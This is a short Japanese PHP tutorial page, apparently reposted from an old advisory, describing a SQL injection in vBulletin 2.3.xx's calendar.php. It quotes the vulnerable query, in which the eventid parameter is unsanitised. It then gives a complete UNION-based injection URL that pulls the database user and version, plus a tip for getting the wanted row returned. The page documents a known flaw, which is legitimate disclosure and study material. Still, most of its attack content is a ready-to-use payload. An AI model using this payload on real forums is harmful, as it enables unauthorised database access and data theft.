ホームページ >バックエンド開発 >PHPチュートリアル >vBulletin フォーラム 2.3.xx SQL インジェクション_PHP チュートリアル

vBulletin フォーラム 2.3.xx SQL インジェクション_PHP チュートリアル

WBOY
WBOYオリジナル
2016-07-21 16:09:261023ブラウズ


vBulletin フォーラム 2.3.xx SQL インジェクション Calendar.php.

にはSQLインジェクションの問題が存在します-------- Calendar.phpの585行目から切り取り ----------
else if ($action == "edit" )
{
$eventinfo = $DB_site->query_first("SELECT allowedmilies,public,userid,
eventdate,event,subject FROM Calendar_events WHEREeventid = $eventid");
---------- ----------------------------------------

MySQLのバージョンが大きい場合4.00 よりも、UNION 攻撃が使用できるようになりました。

-------------------------------------- ---
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(), version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
------------------------ -----------------

query_first 関数はクエリ結果の最初の行のみを返すため、!
必要な行を返すようにしてください。

www.bkjia.comtru​​ehttp://www.bkjia.com/PHPjc/314536.html技術記事 vBulletin フォーラム 2.3.xx SQL インジェクションcalendar.php に SQL インジェクションの問題が存在します。 -------- Calendar.php の 585 行目から切り取り ---------- else if ($action == "edit") { $eventi...
声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。